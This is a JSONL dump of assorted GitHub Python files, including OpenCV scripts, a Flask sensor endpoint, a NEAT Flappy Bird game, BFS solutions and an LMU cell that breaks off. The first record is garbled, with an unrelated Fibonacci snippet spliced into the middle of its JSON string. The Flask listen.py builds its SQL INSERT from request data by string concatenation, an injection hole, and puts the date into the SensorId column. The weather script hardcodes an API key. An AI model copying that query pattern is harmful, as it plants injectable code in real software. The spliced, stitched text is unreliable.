+{"seq_id":"35651692210","text":"import json\nimport os\nimport re\n\nfileOfDirectory = os.listdir('.')\npattern = \"*.json\"\npattern_regex = r\"^www\"\nreplacement = ''\nfile_name = 'urls-para-troca.json'\nnew_file_name = 'www.json'\n\nnew_data = []\n\nwith open(file_name, encoding='utf-8') as f:\n data = json.load(f)\n for i in data:\n aux = re.search(pattern_regex, 
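# --- editor's note: a hedged follow-up to the generator demo above, not in the
# --- original file: with yield the Fibonacci sequence needs no output list and
# --- can even be unbounded; consumers slice off as much as they want.
from itertools import islice

def fib():
    a, b = 1, 1
    while True:  # infinite generator
        yield a
        a, b = b, a + b

# list(islice(fib(), 10)) -> [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]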
str(i['error_link']))\n\n if aux:\n print(i['error_link'])\n new_data.append(i)\n\n with open(new_file_name, 'w') as outfile:\n json.dump(new_data, outfile)\n","repo_name":"freakln/remomeia","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"14593164229","text":"import cv2 as cv\nimport numpy as np\nfrom PIL import Image\nimport tensorflow as tf\nfrom tensorflow.keras import models\n\nclass Model:\n \n def __init__(self):\n self.eye_model = models.load_model(\"eye-model.h5\")\n self.yawn_model = models.load_model(\"yawn-model.h5\")\n\n self.face_cascade = cv.CascadeClassifier(cv.data.haarcascades + 'haarcascade_frontalface_default.xml')\n self.eye_cascade = cv.CascadeClassifier(cv.data.haarcascades + 'haarcascade_eye.xml')\n \n def image_segmentation(self):\n # img = Image.open('frames/frame.jpg')\n # img = img.resize((600, 400), Image.ANTIALIAS)\n # img.save('frames/face.jpg', 'JPEG', quality=95)\n\n img = cv.imread('frames/face.jpg')\n\n # face = self.face_cascade.detectMultiScale(img, 1.5, 1)\n\n # for (fx, fy, fw, fh) in face:\n\n # if fx:\n # print(\"Found a FACE\")\n\n # face_found = cv.rectangle(img, (fx, fy), (fx + fw, fy + fh), (255, 0, 0), 2) # def rectangle(img, pt1, pt2, color, thickness=None, lineType=None, shift=None)\n # # cv.putText(img,'Face',(fx-fw,fy-fh), font, 0.5, (0,255,255), 2, cv.LINE_AA)\n\n # # roi_gray = img[fy:fy+fw, fx:fx+fw]\n # roi_color = img[fy:fy+fw, fx:fx+fw]\n\n eyes = self.eye_cascade.detectMultiScale(img, 1.5, 2)\n\n for (ex, ey, ew, eh) in eyes:\n\n if ex:\n print(\"Found an EYE\")\n\n eye_found = cv.rectangle(img, (ex, ey), (ex + ew, ey + ew), (0, 255, 0), 1)\n\n eyes = img[ey:ey+ew, ex:ex+ew]\n # cv.imshow('Eyes', eyes)\n cv.imwrite('frames/eye.jpg', eyes)\n\n # img = Image.open('frames/eye.jpg')\n # img = img.resize((100, 100), Image.ANTIALIAS)\n # os.remove('frames/eye100.jpg')\n # img.save('frames/eye100.jpg', 'JPEG', quality=95)\n\n # # converting to gray, blur it, and find edges\n # gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n # gray = cv.GaussianBlur(gray, (5,5), 0)\n # edged = cv.Canny(gray, 75, 200) # image, threshold1, threshold2\n\n\n # cv.imshow('Image', img)\n # cv.waitKey()\n\n def predict(self):\n\n self.image_segmentation()\n # For Eyes\n class_names = ['closed', 'open']\n img = cv.imread('frames/eye.jpg')\n dimensions = (100, 100)\n img = cv.resize(img, dimensions)\n # img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n img = tf.keras.applications.vgg16.preprocess_input(img)\n prediction = self.eye_model.predict(np.array([img]))\n index = np.argmax(prediction) # Getting the argument of maximum value(the greatest of all values generated by the neurons)\n\n eye_prediction = class_names[index]\n print(eye_prediction)\n if eye_prediction == \"closed\":\n return \"drowsy\"\n else:\n pass\n\n # For Yawn\n class_names = ['no_yawn', 'yawn']\n img = cv.imread('frames/face.jpg')\n dimensions = (600, 400)\n img = cv.resize(img, dimensions)\n # img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n img = tf.keras.applications.vgg16.preprocess_input(img)\n prediction = self.yawn_model.predict(np.array([img]))\n index = np.argmax(prediction) # Getting the argument of maximum value(the greatest of all values generated by the neurons)\n\n yawn_prediction = class_names[index]\n print(yawn_prediction)\n if yawn_prediction == \"yawn\":\n return \"drowsy\"\n else:\n return \"attentive\"\n \n # the status according to the 
prediction was already returned in the branches above\n","repo_name":"codewithpandey/driver-drowsiness-detection","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"37111103293","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('./photos/robert.jpg')\n\nkernel = np.ones((5,5), np.uint8)\n\n# This increases the thickness of the image\nimgDilation = cv2.dilate(img, kernel, iterations=1)\n\ncv2.imshow(\"Original image\", img)\ncv2.imshow(\"Dilated image\", imgDilation)\n\ncv2.waitKey(0)","repo_name":"Sreekar-Tammana/opencv-programs","sub_path":"dilation.py","file_name":"dilation.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"22039608867","text":"import requests\r\n#import os\r\nfrom datetime import datetime\r\n\r\napi_key = '1f4222114e239c77af03764e4e233e6f'\r\nlocation = input(\"Enter the city name: \")\r\n\r\ncomplete_api_link = \"https://api.openweathermap.org/data/2.5/weather?q=\"+location+\"&appid=\"+api_key\r\napi_link = requests.get(complete_api_link)\r\napi_data = api_link.json()\r\n\r\n#create variables to store and display data\r\ntemp_city =((api_data['main']['temp']) - 273.15)\r\nweather_desc = api_data['weather'][0]['description']\r\nhmdt = api_data['main']['humidity']\r\nwind_spd = api_data['wind']['speed']\r\ndate_time = datetime.now().strftime(\"%d %b %Y | %I:%M:%S %p\")\r\n\r\nprint (\"-------------------------------------------------------------\")\r\nprint (\"Weather Stats for - {} || {}\".format(location.upper(), date_time))\r\nprint (\"-------------------------------------------------------------\")\r\n\r\nprint (\"Current temperature is: {:.2f} deg C\".format(temp_city))\r\nprint (\"Current weather desc :\",weather_desc)\r\nprint (\"Current Humidity :\",hmdt, '%')\r\nprint (\"Current wind speed :\",wind_spd ,'kmph')\r\n# write each reading on its own line; non-string values must be converted first\r\nwith open('weather record.txt', 'w') as f:\r\n f.write(location + '\\n')\r\n f.write(weather_desc + '\\n')\r\n f.write(str(temp_city) + '\\n')\r\n f.write(str(hmdt) + '\\n')\r\n f.write(str(wind_spd) + '\\n')\r\n","repo_name":"siri1904/shapaiproject","sub_path":"shapaiproject.py","file_name":"shapaiproject.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21840538197","text":"from flask import Flask, request\r\nimport json, sqlite3\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef getSensor():\r\n json_dict = request.json\r\n\r\n # get station sensor data array\r\n sensor_array = json_dict['data']\r\n\r\n conn = sqlite3.connect('capteur.db') # connection to the DB\r\n cur = conn.cursor() # initialize a cursor for the DB\r\n print(\"Connected to SQLite DB\")\r\n\r\n print(\"Detected {} sensors\".format(len(sensor_array)))\r\n for i, sensor in enumerate(sensor_array):\r\n print(\"***Sensor {}***\".format(i + 1))\r\n print(\"date_added : {}\".format(sensor['DateAjout']))\r\n print(\"sensor_id : {}\".format(sensor['IdCapteur']))\r\n print(\"value : {}\".format(sensor['Valeur']))\r\n cur.execute(\"INSERT INTO SensorReading (SensorId,DateAdded,Value) 
VALUES('\" + format(\r\n sensor['DateAjout']) + \"',\" + format(sensor['IdCapteur']) + \",\" + format(sensor['Valeur']) + \");\")\r\n conn.commit()\r\n cur.close()\r\n conn.close()\r\n print(\"Connection to SQLite DB closed\")\r\n\r\n # send an acknowledgement message to station\r\n return \"Transfer Success\"\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host=\"0.0.0.0\", port=5050)\r\n","repo_name":"JardinsBruyere/Serveur","sub_path":"listen.py","file_name":"listen.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74996968052","text":"\"\"\"\nPlatform Tools: logo-upload\n\"\"\"\nimport os\nimport uuid\nfrom typing import Optional, Union\n\nfrom hopeit.app.api import event_api\nfrom hopeit.app.context import EventContext, PreprocessHook\nfrom hopeit.app.logger import app_extra_logger\nfrom hopeit.dataobjects import BinaryAttachment\n\nfrom app0.admin.util.object_storage import ObjectStorage, ObjectStorageConf, ObjectStorageConnConfig\nfrom app0.admin.file import PlatformFile\n\nlogger, extra = app_extra_logger()\nobject_store: Optional[ObjectStorage] = None\n\n__steps__ = ['put_object']\n__api__ = event_api(\n fields=[('attachment', BinaryAttachment)],\n responses={\n 200: (PlatformFile, \"Uploaded file info\"),\n 400: (str, \"Missing or invalid fields\")\n }\n)\n\n\nasync def __init_event__(context: EventContext):\n global object_store\n if object_store is None:\n config: ObjectStorageConnConfig = context.settings(key='data_store', datatype=ObjectStorageConnConfig)\n bucket: ObjectStorageConf = context.settings(key='res_images', datatype=ObjectStorageConf)\n object_store = await ObjectStorage().connect(conn_config=config, bucket=bucket.bucket)\n\n\n# pylint: disable=invalid-name\nasync def __preprocess__(payload: None, context: EventContext,\n request: PreprocessHook) -> Union[str, PlatformFile]:\n assert object_store\n uploaded_file: PlatformFile = None # type: ignore\n async for file_hook in request.files():\n _, fextension = os.path.splitext(file_hook.file_name)\n file_name = f\"{str(uuid.uuid4())}{fextension}\"\n logger.info(context, f\"Saving {file_name}...\")\n file_info = await object_store.store_streamed_file(file_name=file_name, file_hook=file_hook)\n if file_info:\n uploaded_file = PlatformFile(\n file_info.bucket, file_info.file_name, file_hook.size, file_hook.file_name, file_name)\n args = await request.parsed_args()\n if not all(x in args for x in ['attachment']):\n request.status = 400\n return \"Missing required fields\"\n return uploaded_file\n\n\nasync def put_object(payload: PlatformFile, context: EventContext) -> PlatformFile:\n return payload\n","repo_name":"fhernand23/stateless-microservices-platform","sub_path":"app0-admin/app0-admin/src/app0/admin/api/logo_upload.py","file_name":"logo_upload.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"2025960356","text":"import pygame\nimport neat\nimport time\nimport os\nimport random\npygame.font.init()\n# SET DIMENSION OF SCREEN\n\nWIN_WIDTH = 500\nWIN_HEIGHT = 800\n\n# LOAD THE IMAGES:\n# scale2x makes the image twice as big.\n\nBIRD_IMGS = [pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird1.png\"))),\n pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird2.png\"))),\n pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird3.png\")))]\nPIPE_IMG = 
pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"pipe.png\")))\nBASE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"base.png\")))\nBG_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bg.png\")))\n\nSTAT_FONT = pygame.font.SysFont(\"comicsans\", 50) # font of score\n\n# Generate one bird to test out:\n# Create Bird class:\n\nclass Bird:\n    IMGS = BIRD_IMGS\n    MAX_ROTATION = 25 # HOW MUCH BIRD IS GOING TO TILT\n    ROT_VEL = 20 # HOW MUCH WE ARE GOING TO ROTATE ON EACH FRAME\n    ANIMATION_TIME = 5 # HOW LONG WE ARE SHOWING EACH BIRD ANIMATION\n\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n        self.tilt = 0 # initialize at 0 because our bird will start flat\n        self.tick_count = 0\n        self.vel = 0 # velocity starts at 0 because it is not moving\n        self.height = self.y\n        self.img_count = 0 # shows which image of the bird is currently showing\n        self.img = self.IMGS[0] # going to reference the first image in BIRD_IMGS\n\n    def jump(self):\n        self.vel = -10.5 #bird velocity\n        self.tick_count = 0 # keep count of when we last jump, we need to reset it to 0\n        self.height = self.y\n\n    def move(self):\n        self.tick_count += 1 # a tick happened\n\n        displacement = self.vel*self.tick_count + 1.5*self.tick_count**2\n\n        if displacement >= 16:\n            displacement = 16\n\n        if displacement < 0:\n            displacement -= 2\n\n        self.y = self.y + displacement\n\n        if displacement < 0 or self.y < self.height + 50:\n            if self.tilt < self.MAX_ROTATION:\n                self.tilt = self.MAX_ROTATION\n        else:\n            if self.tilt > -90:\n                self.tilt -= self.ROT_VEL\n\n    def draw(self, win):\n        self.img_count += 1\n\n        if self.img_count < self.ANIMATION_TIME:\n            self.img = self.IMGS[0]\n        elif self.img_count < self.ANIMATION_TIME*2:\n            self.img = self.IMGS[1]\n        elif self.img_count < self.ANIMATION_TIME*3:\n            self.img = self.IMGS[2]\n        elif self.img_count < self.ANIMATION_TIME*4:\n            self.img = self.IMGS[1]\n        elif self.img_count < self.ANIMATION_TIME*4 + 1:\n            self.img = self.IMGS[0]\n            self.img_count = 0\n\n        if self.tilt <= -80:\n            self.img = self.IMGS[1]\n            self.img_count = self.ANIMATION_TIME*2\n\n        rotated_image = pygame.transform.rotate(self.img, self.tilt)\n        new_rectangle = rotated_image.get_rect(center = self.img.get_rect(topleft = (self.x, self.y)).center)\n        win.blit(rotated_image, new_rectangle.topleft)\n\n    def get_mask(self):\n        return pygame.mask.from_surface(self.img)\n\n\nclass Pipe:\n    GAP = 200\n    VEL = 5\n\n    def __init__(self, x):\n        self.x = x\n        self.height = 0\n\n        self.top = 0\n        self.bottom = 0\n        self.PIPE_TOP = pygame.transform.flip(PIPE_IMG, False, True) # flips the image upside down\n        self.PIPE_DOWN = PIPE_IMG\n\n        self.passed = False\n        self.set_height() # how tall are the pipes\n\n    def set_height(self):\n        self.height = random.randrange(50 ,450)\n        self.top = self.height - self.PIPE_TOP.get_height()\n        self.bottom = self.height + self.GAP\n\n    def move(self):\n        self.x -= self.VEL\n\n    def draw(self, win):\n        win.blit(self.PIPE_TOP, (self.x, self.top))\n        win.blit(self.PIPE_DOWN, (self.x, self.bottom))\n\n    def collide(self, bird):\n        bird_mask = bird.get_mask()\n        top_mask = pygame.mask.from_surface(self.PIPE_TOP)\n        bottom_mask = pygame.mask.from_surface(self.PIPE_DOWN)\n\n        top_offset = (self.x - bird.x, self.top - round(bird.y))\n        bottom_offset = (self.x - bird.x, self.bottom - round(bird.y))\n\n        b_point = bird_mask.overlap(bottom_mask, bottom_offset) # tells us point of collision between bird and pipe\n        t_point = bird_mask.overlap(top_mask, top_offset)\n\n        if t_point or b_point:\n            return True\n\n        return 
False\n\n\nclass Base:\n    VEL = 5\n    WIDTH = BASE_IMG.get_width()\n    IMG = BASE_IMG\n\n    def __init__(self, y):\n        self.y = y\n        self.x1 = 0\n        self.x2 = self.WIDTH\n\n    def move(self):\n        self.x1 -= self.VEL\n        self.x2 -= self.VEL\n\n        if self.x1 + self.WIDTH < 0:\n            self.x1 = self.x2 + self.WIDTH\n        if self.x2 + self.WIDTH < 0:\n            self.x2 = self.x1 + self.WIDTH\n\n    def draw(self, win):\n        win.blit(self.IMG, (self.x1, self.y))\n        win.blit(self.IMG, (self.x2, self.y))\n\n\n# create windows where it will display\ndef draw_window(win, birds, pipes, base, score):\n    win.blit(BG_IMG, (0, 0))\n    for pipe in pipes:\n        pipe.draw(win)\n\n    text = STAT_FONT.render(\"Score: \" + str(score), 1, (255, 255, 255))\n    win.blit(text, (WIN_WIDTH - 10 - text.get_width(), 10))\n    base.draw(win)\n\n    for bird in birds:\n        bird.draw(win)\n    pygame.display.update()\n\n\n# run main loop of game\ndef main(genomes, config):\n    nets = []\n    ge = []\n    birds = []\n\n# the reason why we put the '_' in the _, g for loop is because genome is a tuple (1, ge[0]), (2, ge[1]), (3, ge[2])\n# and we only want the value of ge[x], not the first value which states the location.\n    for _, g in genomes:\n        net = neat.nn.FeedForwardNetwork.create(g, config)\n        nets.append(net)\n        birds.append(Bird(230, 350))\n        g.fitness = 0\n        ge.append(g)\n\n\n    base = Base(730)\n    pipes = [Pipe(500)]\n    win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n    clock = pygame.time.Clock()\n\n    score = 0\n\n    run = True\n    while run:\n        clock.tick(30)\n\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                run = False\n                pygame.quit()\n                quit()\n\n        pipe_ind = 0\n        if len(birds) > 0:\n            if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_TOP.get_width():\n                pipe_ind = 1\n        else:\n            run = False\n            break\n\n        for x, bird in enumerate(birds):\n            bird.move()\n            ge[x].fitness += 0.1\n\n            output = nets[x].activate((bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))\n\n            if output[0] > 0.5:\n                bird.jump()\n\n        add_pipe = False\n        rem = []\n        for pipe in pipes:\n            for x, bird in enumerate(birds):\n                if pipe.collide(bird):\n                    ge[x].fitness -= 1\n                    birds.pop(x)\n                    nets.pop(x)\n                    ge.pop(x)\n\n                if not pipe.passed and pipe.x < bird.x:\n                    pipe.passed = True\n                    add_pipe = True\n\n            if pipe.x + pipe.PIPE_TOP.get_width() < 0:\n                rem.append(pipe)\n\n            pipe.move()\n\n        if add_pipe:\n            score += 1\n            for g in ge:\n                g.fitness += 5\n            pipes.append(Pipe(500))\n\n        for r in rem:\n            pipes.remove(r)\n\n        for x, bird in enumerate(birds):\n            if bird.y + bird.img.get_height() >= 730 or bird.y < 0:\n                birds.pop(x)\n                nets.pop(x)\n                ge.pop(x)\n\n        #bird.move()\n        base.move()\n        draw_window(win, birds , pipes, base, score)\n\n\n\ndef run(config_path):\n    config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,\n                                neat.DefaultSpeciesSet, neat.DefaultStagnation,\n                                config_path)\n\n    p = neat.Population(config)\n\n    p.add_reporter(neat.StdOutReporter(True))\n    stats = neat.StatisticsReporter()\n    p.add_reporter(stats)\n\n    winner = p.run(main,50)\n\n\nif __name__ == \"__main__\":\n    local_directory = os.path.dirname(__file__)\n    config_path = os.path.join(local_directory, \"config-feedforward.txt\")\n    run(config_path)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"machevres6/Flappy_Bird_AI","sub_path":"flappy_bird.py","file_name":"flappy_bird.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38282581978","text":"'''\nChallenge 061 (Desafio 061):\nRedo Challenge 051, reading the first term and the common difference of an AP, 
showing the\nfirst 10 terms of the progression using a while loop.\n'''\nfrom time import sleep\n\ndef isfloat(i):\n    try:\n        i = float(i)\n        return True\n    except ValueError:\n        return False\n\n\nprint('+ ' * 17 + '+')\nprint(' Arithmetic Progression Calculator ')\nprint('+ ' * 17 + '+')\n\n\nwhile True:\n    print('Enter the first value:')\n    v = input('> ').strip()\n    if isfloat(v) and float(v) > 0:\n        v = float(v)\n        break\n    else:\n        print('Invalid Value!\\n')\n        continue\nwhile True:\n    print('Enter the difference:')\n    d = input('> ').strip()\n    if isfloat(d):\n        d = float(d)\n        break\n    else:\n        print('Invalid Value!\\n')\n        continue\n\nc = 0\ntotal = 0\nwhile c < 10:\n    total += (v + (d * c))\n    print('{:.1f}'.format(v + (d * c)), end='')\n    sleep(0.3)\n    print(' → ' if c < 9 else '', end='')\n    c += 1\n\nprint('\\nThe sum of that AP is: {}.'.format(total))\n","repo_name":"marcosdemelo00/Python-Exercises-CursoemVideo","sub_path":"World 2 - ex036 to ex071/ex061 - Progressão Aritimética v2.0 (Arithmetic Progression v2.0).py","file_name":"ex061 - Progressão Aritimética v2.0 (Arithmetic Progression v2.0).py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73310321334","text":"import random\nimport uuid\nimport time\nimport copy\nfrom npc import Npc\nfrom twisted.internet import task\nfrom twisted.python import log\nimport ConfigParser\n\nclass NpcSpawn:\n\n\n    def __init__(self, name, x, y, w, h, zone, spawn_max, spawn_delay, world):\n        \n        self.name = name\n        self.x = x\n        self.y = y\n        self.w = w\n        self.h = h\n        self.zone = zone\n        self.spawn_max = spawn_max\n        self.spawn_delay = spawn_delay\n        self.world = world\n        self.spawn_count = 0\n\n        # Schedule update task\n        self.spawn_task = task.LoopingCall(self.spawn)\n        self.spawn_task.start(self.spawn_delay, now=False)\n        \n        log.msg( \"Loaded NPC SPAWN %s\" % self.name )\n\n    def spawn(self):\n\n        if self.spawn_count < self.spawn_max:\n            x = random.randint(self.x, self.x + self.w)\n            y = random.randint(self.y, self.y + self.h)\n            \n            # Create npc\n            Npc(self.name, x, y, self.zone, self.world, self)\n            \n            self.spawn_count += 1\n    \n","repo_name":"dslice25/tinymmo-server","sub_path":"server/world/npcspawn.py","file_name":"npcspawn.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74319086131","text":"import pandas as pd \nimport json \nimport networkx as nx\nimport matplotlib.pyplot as plt \nimport numpy as np \n\ndef print_graph(df: pd.DataFrame, title: str='', save_loc: str='', no_other: bool=False, no_loop: bool=False):\n\n    if no_other:\n        df = df.drop(axis=0, labels=['other'])\n        df = df.drop(axis=1, labels=['other'])\n    if no_loop:\n        n = df.to_numpy() \n        np.fill_diagonal(n, 0.0) \n        df = pd.DataFrame(data=n, columns=df.columns, index=df.index)\n\n    plt.figure() \n    cols = df.columns\n    df.columns = list(range(len(df.columns))) \n    df.index = list(range(len(df.index)))\n\n    edge_list = [] \n    max_weight = df.max().max() \n\n    for c in df.columns: \n        for i in df.index:\n            weight = ((df.loc[i, c])/max_weight)\n            #weight = (df.loc[i, c])\n            edge_list.append({'from': c, 'to': i, 'weight': weight}) \n    \n    edge_list = pd.DataFrame(edge_list)\n    print(edge_list.max())\n    \n    G = nx.from_pandas_edgelist(edge_list, source='from', target='to', edge_attr='weight')\n    pos = nx.circular_layout(G) # positions for all nodes\n    \n    # nodes\n    nx.draw_networkx_nodes(G, pos, node_size=100)\n\n    # edges\n    edges = G.edges()\n    
weights = [G[u][v]['weight'] for u,v in edges]\n    nx.draw_networkx_edges(G, pos, width=weights)\n    nx.draw_networkx_labels(G, pos, {k: k for k in df.columns}, font_size=16)\n\n    for i, c in enumerate(cols):\n        print(f'{c}: {i}')\n\n    if save_loc!='':\n        plt.title(title)\n        plt.tight_layout()\n        plt.savefig(save_loc, format=\"PNG\")\n    \n\n\ndef fetch_top_users_from_file(subreddit: str) -> list:\n    json_top_users = json.load(open('scalp/cache/top_users.json', 'r'))\n    set_top_users = set() \n    try:\n        for d_type in json_top_users[subreddit].keys():\n            for date in json_top_users[subreddit][d_type].keys():\n                fetchable_top = [a[0] for a in json_top_users[subreddit][d_type][date]['fetchable']]\n                set_top_users = set_top_users | set(fetchable_top)\n    except Exception as e:\n        pass \n\n    return list(set_top_users)\n\ndef fetch_rand_users_from_file(subreddit: str) -> list:\n    json_users = json.load(open('scalp/cache/rand_users.json', 'r')) \n    return json_users[subreddit]","repo_name":"Caizoo/Reddit","sub_path":"migration/migrate_helper.py","file_name":"migrate_helper.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70255324852","text":"from collections import deque\nimport sys\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\nboard = [list(map(int, input().split())) for _ in range(N)]\n\ndef bfs(y,x):\n    q = deque([(y,x)])\n    while q:\n        ey, ex = q.popleft()\n        chk[ey][ex] = True\n        if board[ey][ex] != 0:\n            for k in range(4):\n                ny = ey + dy[k]\n                nx = ex + dx[k]\n                if 0 <= ny < N and 0 <= nx < M and chk[ny][nx] == False:\n                    chk[ny][nx] = True\n                    q.append((ny,nx))\n    return 1\n\nreps = 0 # year counter\n# direction vectors for exploring the four neighbours\ndy = [0, 1, 0, -1]\ndx = [1, 0, -1, 0]\nnode_chk = [[False] * M for _ in range(N)]\n\nwhile 1:\n    reps += 1\n    for j in range(N):\n        for i in range(M):\n            if board[j][i] == 0 and node_chk[j][i] == False:\n                for k in range(4):\n                    nj = j + dy[k]\n                    ni = i + dx[k]\n                    if 0 <= nj < N and 0 <= ni < M:\n                        if board[nj][ni] != 0:\n                            board[nj][ni] -= 1\n                            node_chk[nj][ni] = True\n    \n    chk = [[False]*M for _ in range(N)]\n    cnt = 0\n    for j in range(N):\n        for i in range(M):\n            if board[j][i] != 0 and chk[j][i] == False:\n                chk[j][i] = True\n                cnt += bfs(j,i)\n    if cnt >= 2:\n        break\n\n# for j in range(N):\n#     for i in range(M):\n#         print(board[j][i], end='')\n#     print()\nprint(reps)\n\n\n# Solution that avoids time-limit-exceeded, source: https://velog.io/@hygge/Python-%EB%B0%B1%EC%A4%80-2573-%EB%B9%99%EC%82%B0-BFS\nimport sys\nfrom collections import deque\ninput = sys.stdin.readline\n\n\ndef bfs(x, y):\n    q = deque([(x, y)])\n    visited[x][y] = 1\n    seaList = []\n\n    while q:\n        x, y = q.popleft()\n        sea = 0\n        for i in range(4):\n            nx = x + dx[i]\n            ny = y + dy[i]\n            if 0 <= nx < n and 0 <= ny < m:\n                if not graph[nx][ny]:\n                    sea += 1\n                elif graph[nx][ny] and not visited[nx][ny]:\n                    q.append((nx, ny))\n                    visited[nx][ny] = 1\n        if sea > 0:\n            seaList.append((x, y, sea))\n    for x, y, sea in seaList:\n        graph[x][y] = max(0, graph[x][y] - sea)\n\n    return 1\n\n\nn, m = map(int, input().split())\ngraph = [list(map(int, input().split())) for _ in range(n)]\n\nice = []\nfor i in range(n):\n    for j in range(m):\n        if graph[i][j]:\n            ice.append((i, j))\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\nyear = 0\n\nwhile ice:\n    visited = [[0] * m for _ in range(n)]\n    delList = []\n    group = 0\n    for i, j in ice:\n        if graph[i][j] and not visited[i][j]:\n            group += bfs(i, j)\n            if graph[i][j] == 0:\n                delList.append((i, j))\n    if group > 1:\n        print(year)\n        break\n    ice = sorted(list(set(ice) - set(delList)))\n    year += 
1\n\nif group < 2:\n print(0)\n\n\nimport sys\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\nmap = [list(map(int, input().split())) for _ in range(N)]\n\nice = []\nfor j in range(N):\n for i in range(M):\n ice.append((j,i))\nprint(ice)","repo_name":"vfrnji124/algorithm_practice","sub_path":"Baekjoon/BAEKJOON2573_빙산_0306_01.py","file_name":"BAEKJOON2573_빙산_0306_01.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4186148804","text":"\"\"\"\nLet's test your coding skills!\nTake a string as input and output each letter of the string on a new line, repeated N times, where N is the position of the letter in the string.\n\"\"\"\n# My variant\nstring = input()\ncount = 0\nfor i in string:\n print(i*(count+1))\n count+=1\n\"\"\"\nSololearn variant\nword = input()\nprint()\ni = 0\nwhile (i < len(word)):\n print(word[i]*(i+1))\n i+=1 \n #i++ - habit from C++ syntax\n \"\"\"\n","repo_name":"EMiheeva/Study_Python","sub_path":"Sololearn_Python_Data_Structure/Working with strings/4.2 String Operations. Practice/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23340140390","text":"# Based on https://github.com/hrshtv/pytorch-lmu\n\nimport numpy as np\nimport torch\nfrom scipy.signal import cont2discrete\nfrom torch import fft, nn\nfrom torch.nn import functional as F\nfrom torch.nn import init\n\n\ndef leCunUniform(tensor):\n \"\"\"\n LeCun Uniform Initializer\n \"\"\"\n fan_in = init._calculate_correct_fan(tensor, \"fan_in\")\n limit = np.sqrt(3.0 / fan_in)\n init.uniform_(\n tensor, -limit, limit\n ) # fills the tensor with values sampled from U(-limit, limit)\n\n\nclass LMUCell(nn.Module):\n \"\"\"LMU Cell.\n\n Parameters:\n input_size (int) :\n Size of the input vector (x_t)\n hidden_size (int) :\n Size of the hidden vector (h_t)\n memory_size (int) :\n Size of the memory vector (m_t)\n theta (int) :\n The number of timesteps in the sliding window that is\n represented using the LTI system\n learn_a (boolean) :\n Whether to learn the matrix A (default = False)\n learn_b (boolean) :\n Whether to learn the matrix B (default = False)\n \"\"\"\n\n def __init__(\n self, input_size, hidden_size, memory_size, theta, learn_a=False, learn_b=False\n ):\n super(LMUCell, self).__init__()\n\n self.hidden_size = hidden_size\n self.memory_size = memory_size\n self.f = nn.Tanh()\n\n A, B = self.stateSpaceMatrices(memory_size, theta)\n A = torch.from_numpy(A).float()\n B = torch.from_numpy(B).float()\n\n if learn_a:\n self.A = nn.Parameter(A)\n else:\n self.register_buffer(\"A\", A)\n\n if learn_b:\n self.B = nn.Parameter(B)\n else:\n self.register_buffer(\"B\", B)\n\n # Declare Model parameters:\n # Encoding vectors\n self.e_x = nn.Parameter(torch.empty(1, input_size))\n self.e_h = nn.Parameter(torch.empty(1, hidden_size))\n self.e_m = nn.Parameter(torch.empty(1, memory_size))\n # Kernels\n self.W_x = nn.Parameter(torch.empty(hidden_size, input_size))\n self.W_h = nn.Parameter(torch.empty(hidden_size, hidden_size))\n self.W_m = nn.Parameter(torch.empty(hidden_size, memory_size))\n\n self.initParameters()\n\n def initParameters(self):\n \"\"\"Initialize the cell's parameters.\"\"\"\n\n # Initialize encoders\n leCunUniform(self.e_x)\n leCunUniform(self.e_h)\n 